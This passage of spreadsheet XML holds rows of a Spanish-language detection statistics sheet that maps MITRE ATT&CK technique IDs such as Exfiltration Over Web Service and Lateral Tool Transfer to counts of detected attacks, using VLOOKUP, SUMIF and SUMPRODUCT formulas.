      </c>
      <c r="AH59" s="392">
        <v>15</v>
      </c>
      <c r="AI59" s="16">
        <v>1</v>
      </c>
      <c r="AJ59" s="394">
        <v>31</v>
      </c>
      <c r="AK59" s="392">
        <v>1311</v>
      </c>
      <c r="AL59" s="392">
        <v>82</v>
      </c>
      <c r="AM59" s="322">
        <v>0</v>
      </c>
      <c r="AN59" s="392">
        <v>26</v>
      </c>
      <c r="AO59" s="16">
        <v>1</v>
      </c>
      <c r="AP59" s="394">
        <v>39</v>
      </c>
      <c r="AQ59" s="292">
        <v>0</v>
      </c>
      <c r="AR59" s="322">
        <v>0</v>
      </c>
      <c r="AS59" s="322">
        <v>0</v>
      </c>
      <c r="AT59" s="12">
        <v>0</v>
      </c>
      <c r="AU59" s="13">
        <v>0</v>
      </c>
      <c r="AV59" s="394">
        <v>0</v>
      </c>
      <c r="AW59" s="392">
        <v>3</v>
      </c>
      <c r="AX59" s="392">
        <v>2</v>
      </c>
      <c r="AY59" s="322">
        <v>0</v>
      </c>
      <c r="AZ59" s="4">
        <v>2</v>
      </c>
      <c r="BA59" s="16">
        <v>1</v>
      </c>
      <c r="BB59" s="394">
        <v>2</v>
      </c>
      <c r="BC59" s="292">
        <v>1240</v>
      </c>
      <c r="BD59" s="322">
        <v>42</v>
      </c>
      <c r="BE59" s="322">
        <v>0</v>
      </c>
      <c r="BF59" s="12">
        <v>11</v>
      </c>
      <c r="BG59" s="13">
        <v>1</v>
      </c>
      <c r="BH59" s="394">
        <v>20</v>
      </c>
      <c r="BI59" s="292">
        <v>3</v>
      </c>
      <c r="BJ59" s="322">
        <v>2</v>
      </c>
      <c r="BK59" s="322">
        <v>0</v>
      </c>
      <c r="BL59" s="12">
        <v>2</v>
      </c>
      <c r="BM59" s="13">
        <v>0.5</v>
      </c>
      <c r="BN59" s="394">
        <v>1</v>
      </c>
      <c r="BO59" s="292">
        <v>176</v>
      </c>
      <c r="BP59" s="322">
        <v>175</v>
      </c>
      <c r="BQ59" s="322">
        <v>0</v>
      </c>
      <c r="BR59" s="12">
        <v>2</v>
      </c>
      <c r="BS59" s="12">
        <v>7</v>
      </c>
      <c r="BT59" s="13">
        <v>1</v>
      </c>
      <c r="BU59" s="394">
        <v>170</v>
      </c>
      <c r="BV59" s="292">
        <v>3</v>
      </c>
      <c r="BW59" s="322">
        <v>3</v>
      </c>
      <c r="BX59" s="322">
        <v>0</v>
      </c>
      <c r="BY59" s="12">
        <v>2</v>
      </c>
      <c r="BZ59" s="13">
        <v>1</v>
      </c>
      <c r="CA59" s="394">
        <v>2</v>
      </c>
      <c r="CB59" s="292">
        <v>3</v>
      </c>
      <c r="CC59" s="322">
        <v>3</v>
      </c>
      <c r="CD59" s="322">
        <v>0</v>
      </c>
      <c r="CE59" s="12">
        <v>2</v>
      </c>
      <c r="CF59" s="12">
        <v>0</v>
      </c>
      <c r="CG59" s="13">
        <v>1</v>
      </c>
      <c r="CH59" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="60" spans="1:86" ht="15" customHeight="1">
      <c r="A60" s="4">
        <f t="shared" si="0"/>
        <v>58</v>
      </c>
      <c r="B60" s="4" t="str">
        <f>IFERROR(VLOOKUP(A60,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1567</v>
      </c>
      <c r="C60" s="493" t="str">
        <f>IFERROR(VLOOKUP(B60,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exfiltration Over Web Service</v>
      </c>
      <c r="D60" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B60)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E60" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>26</v>
      </c>
      <c r="F60" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (26)</v>
      </c>
      <c r="G60" s="292">
        <v>5</v>
      </c>
      <c r="H60" s="322">
        <v>5</v>
      </c>
      <c r="I60" s="322">
        <v>0</v>
      </c>
      <c r="J60" s="12">
        <v>3</v>
      </c>
      <c r="K60" s="13">
        <v>1</v>
      </c>
      <c r="L60" s="394">
        <v>2</v>
      </c>
      <c r="M60" s="322">
        <v>0</v>
      </c>
      <c r="N60" s="322">
        <v>0</v>
      </c>
      <c r="O60" s="322">
        <v>0</v>
      </c>
      <c r="P60" s="12">
        <v>0</v>
      </c>
      <c r="Q60" s="13">
        <v>0</v>
      </c>
      <c r="R60" s="394">
        <v>0</v>
      </c>
      <c r="S60" s="292">
        <v>5</v>
      </c>
      <c r="T60" s="322">
        <v>5</v>
      </c>
      <c r="U60" s="322">
        <v>0</v>
      </c>
      <c r="V60" s="12">
        <v>3</v>
      </c>
      <c r="W60" s="13">
        <v>1</v>
      </c>
      <c r="X60" s="394">
        <v>2</v>
      </c>
      <c r="Y60" s="392">
        <v>7</v>
      </c>
      <c r="Z60" s="392">
        <v>7</v>
      </c>
      <c r="AA60" s="322">
        <v>0</v>
      </c>
      <c r="AB60" s="392">
        <v>4</v>
      </c>
      <c r="AC60" s="16">
        <v>1</v>
      </c>
      <c r="AD60" s="394">
        <v>2</v>
      </c>
      <c r="AE60" s="392">
        <v>12</v>
      </c>
      <c r="AF60" s="392">
        <v>11</v>
      </c>
      <c r="AG60" s="322">
        <v>0</v>
      </c>
      <c r="AH60" s="392">
        <v>3</v>
      </c>
      <c r="AI60" s="16">
        <v>1</v>
      </c>
      <c r="AJ60" s="394">
        <v>10</v>
      </c>
      <c r="AK60" s="392">
        <v>19</v>
      </c>
      <c r="AL60" s="392">
        <v>18</v>
      </c>
      <c r="AM60" s="322">
        <v>0</v>
      </c>
      <c r="AN60" s="392">
        <v>7</v>
      </c>
      <c r="AO60" s="16">
        <v>1</v>
      </c>
      <c r="AP60" s="394">
        <v>11</v>
      </c>
      <c r="AQ60" s="292">
        <v>0</v>
      </c>
      <c r="AR60" s="322">
        <v>0</v>
      </c>
      <c r="AS60" s="322">
        <v>0</v>
      </c>
      <c r="AT60" s="12">
        <v>0</v>
      </c>
      <c r="AU60" s="13">
        <v>0</v>
      </c>
      <c r="AV60" s="394">
        <v>0</v>
      </c>
      <c r="AW60" s="392">
        <v>0</v>
      </c>
      <c r="AX60" s="392">
        <v>0</v>
      </c>
      <c r="AY60" s="322">
        <v>0</v>
      </c>
      <c r="AZ60" s="4">
        <v>0</v>
      </c>
      <c r="BA60" s="16">
        <v>0</v>
      </c>
      <c r="BB60" s="394">
        <v>0</v>
      </c>
      <c r="BC60" s="292">
        <v>5</v>
      </c>
      <c r="BD60" s="322">
        <v>5</v>
      </c>
      <c r="BE60" s="322">
        <v>0</v>
      </c>
      <c r="BF60" s="12">
        <v>3</v>
      </c>
      <c r="BG60" s="13">
        <v>1</v>
      </c>
      <c r="BH60" s="394">
        <v>2</v>
      </c>
      <c r="BI60" s="292">
        <v>2</v>
      </c>
      <c r="BJ60" s="322">
        <v>2</v>
      </c>
      <c r="BK60" s="322">
        <v>0</v>
      </c>
      <c r="BL60" s="12">
        <v>1</v>
      </c>
      <c r="BM60" s="13">
        <v>1</v>
      </c>
      <c r="BN60" s="394">
        <v>2</v>
      </c>
      <c r="BO60" s="292">
        <v>13</v>
      </c>
      <c r="BP60" s="322">
        <v>13</v>
      </c>
      <c r="BQ60" s="322">
        <v>0</v>
      </c>
      <c r="BR60" s="12">
        <v>1</v>
      </c>
      <c r="BS60" s="12">
        <v>3</v>
      </c>
      <c r="BT60" s="13">
        <v>1</v>
      </c>
      <c r="BU60" s="394">
        <v>11</v>
      </c>
      <c r="BV60" s="292">
        <v>0</v>
      </c>
      <c r="BW60" s="322">
        <v>0</v>
      </c>
      <c r="BX60" s="322">
        <v>0</v>
      </c>
      <c r="BY60" s="12">
        <v>0</v>
      </c>
      <c r="BZ60" s="13">
        <v>0</v>
      </c>
      <c r="CA60" s="394">
        <v>0</v>
      </c>
      <c r="CB60" s="292">
        <v>0</v>
      </c>
      <c r="CC60" s="322">
        <v>0</v>
      </c>
      <c r="CD60" s="322">
        <v>0</v>
      </c>
      <c r="CE60" s="12">
        <v>0</v>
      </c>
      <c r="CF60" s="12">
        <v>0</v>
      </c>
      <c r="CG60" s="13">
        <v>0</v>
      </c>
      <c r="CH60" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="61" spans="1:86" ht="15" customHeight="1">
      <c r="A61" s="4">
        <f t="shared" si="0"/>
        <v>59</v>
      </c>
      <c r="B61" s="4" t="str">
        <f>IFERROR(VLOOKUP(A61,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1568</v>
      </c>
      <c r="C61" s="493" t="str">
        <f>IFERROR(VLOOKUP(B61,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Dynamic Resolution</v>
      </c>
      <c r="D61" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B61)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E61" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B61,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>267</v>
      </c>
      <c r="F61" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (267)</v>
      </c>
      <c r="G61" s="292">
        <v>1</v>
      </c>
      <c r="H61" s="322">
        <v>1</v>
      </c>
      <c r="I61" s="322">
        <v>0</v>
      </c>
      <c r="J61" s="12">
        <v>1</v>
      </c>
      <c r="K61" s="13">
        <v>1</v>
      </c>
      <c r="L61" s="394">
        <v>1</v>
      </c>
      <c r="M61" s="322">
        <v>5</v>
      </c>
      <c r="N61" s="322">
        <v>1</v>
      </c>
      <c r="O61" s="322">
        <v>0</v>
      </c>
      <c r="P61" s="12">
        <v>1</v>
      </c>
      <c r="Q61" s="13">
        <v>1</v>
      </c>
      <c r="R61" s="394">
        <v>1</v>
      </c>
      <c r="S61" s="292">
        <v>6</v>
      </c>
      <c r="T61" s="322">
        <v>2</v>
      </c>
      <c r="U61" s="322">
        <v>0</v>
      </c>
      <c r="V61" s="12">
        <v>2</v>
      </c>
      <c r="W61" s="13">
        <v>1</v>
      </c>
      <c r="X61" s="394">
        <v>2</v>
      </c>
      <c r="Y61" s="392">
        <v>267</v>
      </c>
      <c r="Z61" s="392">
        <v>251</v>
      </c>
      <c r="AA61" s="322">
        <v>0</v>
      </c>
      <c r="AB61" s="392">
        <v>7</v>
      </c>
      <c r="AC61" s="16">
        <v>1</v>
      </c>
      <c r="AD61" s="394">
        <v>125</v>
      </c>
      <c r="AE61" s="392">
        <v>23</v>
      </c>
      <c r="AF61" s="392">
        <v>9</v>
      </c>
      <c r="AG61" s="322">
        <v>0</v>
      </c>
      <c r="AH61" s="392">
        <v>5</v>
      </c>
      <c r="AI61" s="16">
        <v>1</v>
      </c>
      <c r="AJ61" s="394">
        <v>3</v>
      </c>
      <c r="AK61" s="392">
        <v>290</v>
      </c>
      <c r="AL61" s="392">
        <v>260</v>
      </c>
      <c r="AM61" s="322">
        <v>0</v>
      </c>
      <c r="AN61" s="392">
        <v>12</v>
      </c>
      <c r="AO61" s="16">
        <v>1</v>
      </c>
      <c r="AP61" s="394">
        <v>127</v>
      </c>
      <c r="AQ61" s="292">
        <v>0</v>
      </c>
      <c r="AR61" s="322">
        <v>0</v>
      </c>
      <c r="AS61" s="322">
        <v>0</v>
      </c>
      <c r="AT61" s="12">
        <v>0</v>
      </c>
      <c r="AU61" s="13">
        <v>0</v>
      </c>
      <c r="AV61" s="394">
        <v>0</v>
      </c>
      <c r="AW61" s="392">
        <v>20</v>
      </c>
      <c r="AX61" s="392">
        <v>4</v>
      </c>
      <c r="AY61" s="322">
        <v>0</v>
      </c>
      <c r="AZ61" s="4">
        <v>4</v>
      </c>
      <c r="BA61" s="16">
        <v>1</v>
      </c>
      <c r="BB61" s="394">
        <v>1</v>
      </c>
      <c r="BC61" s="292">
        <v>26</v>
      </c>
      <c r="BD61" s="322">
        <v>6</v>
      </c>
      <c r="BE61" s="322">
        <v>0</v>
      </c>
      <c r="BF61" s="12">
        <v>6</v>
      </c>
      <c r="BG61" s="13">
        <v>1</v>
      </c>
      <c r="BH61" s="394">
        <v>2</v>
      </c>
      <c r="BI61" s="292">
        <v>0</v>
      </c>
      <c r="BJ61" s="322">
        <v>0</v>
      </c>
      <c r="BK61" s="322">
        <v>0</v>
      </c>
      <c r="BL61" s="12">
        <v>0</v>
      </c>
      <c r="BM61" s="13">
        <v>0</v>
      </c>
      <c r="BN61" s="394">
        <v>0</v>
      </c>
      <c r="BO61" s="292">
        <v>389</v>
      </c>
      <c r="BP61" s="322">
        <v>389</v>
      </c>
      <c r="BQ61" s="322">
        <v>0</v>
      </c>
      <c r="BR61" s="12">
        <v>0</v>
      </c>
      <c r="BS61" s="12">
        <v>6</v>
      </c>
      <c r="BT61" s="13">
        <v>1</v>
      </c>
      <c r="BU61" s="394">
        <v>266</v>
      </c>
      <c r="BV61" s="292">
        <v>3</v>
      </c>
      <c r="BW61" s="322">
        <v>3</v>
      </c>
      <c r="BX61" s="322">
        <v>0</v>
      </c>
      <c r="BY61" s="12">
        <v>1</v>
      </c>
      <c r="BZ61" s="13">
        <v>1</v>
      </c>
      <c r="CA61" s="394">
        <v>3</v>
      </c>
      <c r="CB61" s="292">
        <v>23</v>
      </c>
      <c r="CC61" s="322">
        <v>23</v>
      </c>
      <c r="CD61" s="322">
        <v>0</v>
      </c>
      <c r="CE61" s="12">
        <v>1</v>
      </c>
      <c r="CF61" s="12">
        <v>1</v>
      </c>
      <c r="CG61" s="13">
        <v>1</v>
      </c>
      <c r="CH61" s="394">
        <v>20</v>
      </c>
    </row>
    <row r="62" spans="1:86" ht="15" customHeight="1">
      <c r="A62" s="4">
        <f t="shared" si="0"/>
        <v>60</v>
      </c>
      <c r="B62" s="4" t="str">
        <f>IFERROR(VLOOKUP(A62,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1569</v>
      </c>
      <c r="C62" s="493" t="str">
        <f>IFERROR(VLOOKUP(B62,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>System Services</v>
      </c>
      <c r="D62" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B62)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E62" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B62,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>17</v>
      </c>
      <c r="F62" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (17)</v>
      </c>
      <c r="G62" s="292">
        <v>13</v>
      </c>
      <c r="H62" s="322">
        <v>2</v>
      </c>
      <c r="I62" s="322">
        <v>0</v>
      </c>
      <c r="J62" s="12">
        <v>1</v>
      </c>
      <c r="K62" s="13">
        <v>1</v>
      </c>
      <c r="L62" s="394">
        <v>2</v>
      </c>
      <c r="M62" s="322">
        <v>14</v>
      </c>
      <c r="N62" s="322">
        <v>4</v>
      </c>
      <c r="O62" s="322">
        <v>0</v>
      </c>
      <c r="P62" s="12">
        <v>4</v>
      </c>
      <c r="Q62" s="13">
        <v>1</v>
      </c>
      <c r="R62" s="394">
        <v>2</v>
      </c>
      <c r="S62" s="292">
        <v>27</v>
      </c>
      <c r="T62" s="322">
        <v>6</v>
      </c>
      <c r="U62" s="322">
        <v>0</v>
      </c>
      <c r="V62" s="12">
        <v>5</v>
      </c>
      <c r="W62" s="13">
        <v>1</v>
      </c>
      <c r="X62" s="394">
        <v>3</v>
      </c>
      <c r="Y62" s="392">
        <v>23</v>
      </c>
      <c r="Z62" s="392">
        <v>7</v>
      </c>
      <c r="AA62" s="322">
        <v>0</v>
      </c>
      <c r="AB62" s="392">
        <v>6</v>
      </c>
      <c r="AC62" s="16">
        <v>1</v>
      </c>
      <c r="AD62" s="394">
        <v>4</v>
      </c>
      <c r="AE62" s="392">
        <v>40</v>
      </c>
      <c r="AF62" s="392">
        <v>30</v>
      </c>
      <c r="AG62" s="322">
        <v>0</v>
      </c>
      <c r="AH62" s="392">
        <v>28</v>
      </c>
      <c r="AI62" s="16">
        <v>1</v>
      </c>
      <c r="AJ62" s="394">
        <v>5</v>
      </c>
      <c r="AK62" s="392">
        <v>63</v>
      </c>
      <c r="AL62" s="392">
        <v>37</v>
      </c>
      <c r="AM62" s="322">
        <v>0</v>
      </c>
      <c r="AN62" s="392">
        <v>34</v>
      </c>
      <c r="AO62" s="16">
        <v>1</v>
      </c>
      <c r="AP62" s="394">
        <v>6</v>
      </c>
      <c r="AQ62" s="292">
        <v>0</v>
      </c>
      <c r="AR62" s="322">
        <v>0</v>
      </c>
      <c r="AS62" s="322">
        <v>0</v>
      </c>
      <c r="AT62" s="12">
        <v>0</v>
      </c>
      <c r="AU62" s="13">
        <v>0</v>
      </c>
      <c r="AV62" s="394">
        <v>0</v>
      </c>
      <c r="AW62" s="392">
        <v>2</v>
      </c>
      <c r="AX62" s="392">
        <v>2</v>
      </c>
      <c r="AY62" s="322">
        <v>0</v>
      </c>
      <c r="AZ62" s="4">
        <v>2</v>
      </c>
      <c r="BA62" s="16">
        <v>1</v>
      </c>
      <c r="BB62" s="394">
        <v>2</v>
      </c>
      <c r="BC62" s="292">
        <v>29</v>
      </c>
      <c r="BD62" s="322">
        <v>8</v>
      </c>
      <c r="BE62" s="322">
        <v>0</v>
      </c>
      <c r="BF62" s="12">
        <v>7</v>
      </c>
      <c r="BG62" s="13">
        <v>1</v>
      </c>
      <c r="BH62" s="394">
        <v>5</v>
      </c>
      <c r="BI62" s="292">
        <v>0</v>
      </c>
      <c r="BJ62" s="322">
        <v>0</v>
      </c>
      <c r="BK62" s="322">
        <v>0</v>
      </c>
      <c r="BL62" s="12">
        <v>0</v>
      </c>
      <c r="BM62" s="13">
        <v>0</v>
      </c>
      <c r="BN62" s="394">
        <v>0</v>
      </c>
      <c r="BO62" s="292">
        <v>15</v>
      </c>
      <c r="BP62" s="322">
        <v>14</v>
      </c>
      <c r="BQ62" s="322">
        <v>0</v>
      </c>
      <c r="BR62" s="12">
        <v>0</v>
      </c>
      <c r="BS62" s="12">
        <v>9</v>
      </c>
      <c r="BT62" s="13">
        <v>1</v>
      </c>
      <c r="BU62" s="394">
        <v>10</v>
      </c>
      <c r="BV62" s="292">
        <v>0</v>
      </c>
      <c r="BW62" s="322">
        <v>0</v>
      </c>
      <c r="BX62" s="322">
        <v>0</v>
      </c>
      <c r="BY62" s="12">
        <v>0</v>
      </c>
      <c r="BZ62" s="13">
        <v>0</v>
      </c>
      <c r="CA62" s="394">
        <v>0</v>
      </c>
      <c r="CB62" s="292">
        <v>2</v>
      </c>
      <c r="CC62" s="322">
        <v>2</v>
      </c>
      <c r="CD62" s="322">
        <v>0</v>
      </c>
      <c r="CE62" s="12">
        <v>0</v>
      </c>
      <c r="CF62" s="12">
        <v>2</v>
      </c>
      <c r="CG62" s="13">
        <v>1</v>
      </c>
      <c r="CH62" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="63" spans="1:86" ht="15" customHeight="1">
      <c r="A63" s="4">
        <f t="shared" si="0"/>
        <v>61</v>
      </c>
      <c r="B63" s="4" t="str">
        <f>IFERROR(VLOOKUP(A63,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1570</v>
      </c>
      <c r="C63" s="493" t="str">
        <f>IFERROR(VLOOKUP(B63,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Lateral Tool Transfer</v>
      </c>
      <c r="D63" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B63)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E63" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>7</v>
      </c>
      <c r="F63" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (7)</v>
      </c>
      <c r="G63" s="292">
        <v>7</v>
      </c>
      <c r="H63" s="322">
        <v>2</v>
      </c>
      <c r="I63" s="322">
        <v>0</v>
      </c>
      <c r="J63" s="12">
        <v>1</v>
      </c>
      <c r="K63" s="13">
        <v>1</v>
      </c>
      <c r="L63" s="394">
        <v>2</v>
      </c>
      <c r="M63" s="322">
        <v>3</v>
      </c>
      <c r="N63" s="322">
        <v>2</v>
      </c>
      <c r="O63" s="322">
        <v>0</v>
      </c>
      <c r="P63" s="12">
        <v>1</v>
      </c>
      <c r="Q63" s="13">
        <v>1</v>
      </c>
      <c r="R63" s="394">
        <v>2</v>
      </c>
      <c r="S63" s="292">
        <v>10</v>
      </c>
      <c r="T63" s="322">
        <v>4</v>
      </c>
      <c r="U63" s="322">
        <v>0</v>
      </c>
      <c r="V63" s="12">
        <v>2</v>
      </c>
      <c r="W63" s="13">
        <v>1</v>
      </c>
      <c r="X63" s="394">
        <v>2</v>
      </c>
      <c r="Y63" s="392">
        <v>7</v>
      </c>
      <c r="Z63" s="392">
        <v>2</v>
      </c>
      <c r="AA63" s="322">
        <v>0</v>
      </c>
      <c r="AB63" s="392">
        <v>1</v>
      </c>
      <c r="AC63" s="16">
        <v>1</v>
      </c>
      <c r="AD63" s="394">
        <v>2</v>
      </c>
      <c r="AE63" s="392">
        <v>32</v>
      </c>
      <c r="AF63" s="392">
        <v>21</v>
      </c>
      <c r="AG63" s="322">
        <v>0</v>
      </c>
      <c r="AH63" s="392">
        <v>18</v>
      </c>
      <c r="AI63" s="16">
        <v>1</v>
      </c>
      <c r="AJ63" s="394">
        <v>2</v>
      </c>
      <c r="AK63" s="392">
        <v>39</v>
      </c>
      <c r="AL63" s="392">
        <v>23</v>
      </c>
      <c r="AM63" s="322">
        <v>0</v>
      </c>
      <c r="AN63" s="392">
        <v>19</v>
      </c>
      <c r="AO63" s="16">
        <v>1</v>
      </c>
      <c r="AP63" s="394">
        <v>2</v>
      </c>
      <c r="AQ63" s="292">
        <v>0</v>
      </c>
      <c r="AR63" s="322">
        <v>0</v>
      </c>
      <c r="AS63" s="322">
        <v>0</v>
      </c>
      <c r="AT63" s="12">
        <v>0</v>
      </c>
      <c r="AU63" s="13">
        <v>0</v>
      </c>
      <c r="AV63" s="394">
        <v>0</v>
      </c>
      <c r="AW63" s="392">
        <v>0</v>
      </c>
      <c r="AX63" s="392">
        <v>0</v>
      </c>
      <c r="AY63" s="322">
        <v>0</v>
      </c>
      <c r="AZ63" s="4">
        <v>0</v>
      </c>
      <c r="BA63" s="16">
        <v>0</v>
      </c>
      <c r="BB63" s="394">
        <v>0</v>
      </c>
      <c r="BC63" s="292">
        <v>10</v>
      </c>
      <c r="BD63" s="322">
        <v>4</v>
      </c>
      <c r="BE63" s="322">
        <v>0</v>
      </c>
      <c r="BF63" s="12">
        <v>2</v>
      </c>
      <c r="BG63" s="13">
        <v>1</v>
      </c>
      <c r="BH63" s="394">
        <v>2</v>
      </c>
      <c r="BI63" s="292">
        <v>2</v>
      </c>
      <c r="BJ63" s="322">
        <v>1</v>
      </c>
      <c r="BK63" s="322">
        <v>0</v>
      </c>
      <c r="BL63" s="12">
        <v>1</v>
      </c>
      <c r="BM63" s="13">
        <v>1</v>
      </c>
      <c r="BN63" s="394">
        <v>1</v>
      </c>
      <c r="BO63" s="292">
        <v>2</v>
      </c>
      <c r="BP63" s="322">
        <v>1</v>
      </c>
      <c r="BQ63" s="322">
        <v>0</v>
      </c>
      <c r="BR63" s="12">
        <v>1</v>
      </c>
      <c r="BS63" s="12">
        <v>0</v>
      </c>
      <c r="BT63" s="13">
        <v>1</v>
      </c>
      <c r="BU63" s="394">
        <v>1</v>
      </c>
      <c r="BV63" s="292">
        <v>0</v>
      </c>
      <c r="BW63" s="322">
        <v>0</v>
      </c>
      <c r="BX63" s="322">
        <v>0</v>
      </c>
      <c r="BY63" s="12">
        <v>0</v>
      </c>
      <c r="BZ63" s="13">
        <v>0</v>
      </c>
      <c r="CA63" s="394">
        <v>0</v>
      </c>
      <c r="CB63" s="292">
        <v>0</v>
      </c>
      <c r="CC63" s="322">
        <v>0</v>
      </c>
      <c r="CD63" s="322">
        <v>0</v>
      </c>
      <c r="CE63" s="12">
        <v>0</v>
      </c>
      <c r="CF63" s="12">
        <v>0</v>
      </c>
      <c r="CG63" s="13">
        <v>0</v>
      </c>
      <c r="CH63" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="64" spans="1:86" ht="15" customHeight="1">
      <c r="A64" s="4">
        <f t="shared" si="0"/>
        <v>62</v>
      </c>
      <c r="B64" s="4" t="str">
        <f>IFERROR(VLOOKUP(A64,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1571</v>
      </c>
      <c r="C64" s="4" t="str">
        <f>IFERROR(VLOOKUP(B64,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Non-Standard Port</v>
      </c>
      <c r="D64" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B64)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E64" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F64" s="286" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="G64" s="292">
        <v>2</v>
      </c>
      <c r="H64" s="322">
        <v>1</v>
      </c>
      <c r="I64" s="322">
        <v>0</v>
      </c>
      <c r="J64" s="12">
        <v>1</v>
      </c>
      <c r="K64" s="13">
        <v>1</v>
      </c>
      <c r="L64" s="394">
        <v>1</v>
      </c>
      <c r="M64" s="322">
        <v>0</v>
      </c>
      <c r="N64" s="322">
        <v>0</v>
      </c>
      <c r="O64" s="322">
        <v>0</v>
      </c>
      <c r="P64" s="12">
        <v>0</v>
      </c>
      <c r="Q64" s="13">
        <v>0</v>
      </c>
      <c r="R64" s="394">
        <v>0</v>
      </c>
      <c r="S64" s="292">
        <v>2</v>
      </c>
      <c r="T64" s="322">
        <v>1</v>
      </c>
      <c r="U64" s="322">
        <v>0</v>
      </c>
      <c r="V64" s="12">
        <v>1</v>
      </c>
      <c r="W64" s="13">
        <v>1</v>
      </c>
      <c r="X64" s="394">
        <v>1</v>
      </c>
      <c r="Y64" s="392">
        <v>3</v>
      </c>
      <c r="Z64" s="392">
        <v>2</v>
      </c>
      <c r="AA64" s="322">
        <v>0</v>
      </c>
      <c r="AB64" s="392">
        <v>2</v>
      </c>
      <c r="AC64" s="16">
        <v>1</v>
      </c>
      <c r="AD64" s="394">
        <v>1</v>
      </c>
      <c r="AE64" s="392">
        <v>4</v>
      </c>
      <c r="AF64" s="392">
        <v>2</v>
      </c>
      <c r="AG64" s="322">
        <v>0</v>
      </c>
      <c r="AH64" s="392">
        <v>2</v>
      </c>
      <c r="AI64" s="16">
        <v>1</v>
      </c>
      <c r="AJ64" s="394">
        <v>1</v>
      </c>
      <c r="AK64" s="392">
        <v>7</v>
      </c>
      <c r="AL64" s="392">
        <v>4</v>
      </c>
      <c r="AM64" s="322">
        <v>0</v>
      </c>
      <c r="AN64" s="392">
        <v>4</v>
      </c>
      <c r="AO64" s="16">
        <v>1</v>
      </c>
      <c r="AP64" s="394">
        <v>1</v>
      </c>
      <c r="AQ64" s="292">
        <v>0</v>
      </c>
      <c r="AR64" s="322">
        <v>0</v>
      </c>
      <c r="AS64" s="322">
        <v>0</v>
      </c>
      <c r="AT64" s="12">
        <v>0</v>
      </c>
      <c r="AU64" s="13">
        <v>0</v>
      </c>
      <c r="AV64" s="394">
        <v>0</v>
      </c>
      <c r="AW64" s="392">
        <v>0</v>
      </c>
      <c r="AX64" s="392">
        <v>0</v>
      </c>
      <c r="AY64" s="322">
        <v>0</v>
      </c>
      <c r="AZ64" s="4">
        <v>0</v>
      </c>
      <c r="BA64" s="16">
        <v>0</v>
      </c>
      <c r="BB64" s="394">
        <v>0</v>
      </c>
      <c r="BC64" s="292">
        <v>2</v>
      </c>
      <c r="BD64" s="322">
        <v>1</v>
      </c>
      <c r="BE64" s="322">
        <v>0</v>
      </c>
      <c r="BF64" s="12">
        <v>1</v>
      </c>
      <c r="BG64" s="13">
        <v>1</v>
      </c>
      <c r="BH64" s="394">
        <v>1</v>
      </c>
      <c r="BI64" s="292">
        <v>0</v>
      </c>
      <c r="BJ64" s="322">
        <v>0</v>
      </c>
      <c r="BK64" s="322">
        <v>0</v>
      </c>
      <c r="BL64" s="12">
        <v>0</v>
      </c>
      <c r="BM64" s="13">
        <v>0</v>
      </c>
      <c r="BN64" s="394">
        <v>0</v>
      </c>
      <c r="BO64" s="292">
        <v>2</v>
      </c>
      <c r="BP64" s="322">
        <v>2</v>
      </c>
      <c r="BQ64" s="322">
        <v>0</v>
      </c>
      <c r="BR64" s="12">
        <v>0</v>
      </c>
      <c r="BS64" s="12">
        <v>2</v>
      </c>
      <c r="BT64" s="13">
        <v>1</v>
      </c>
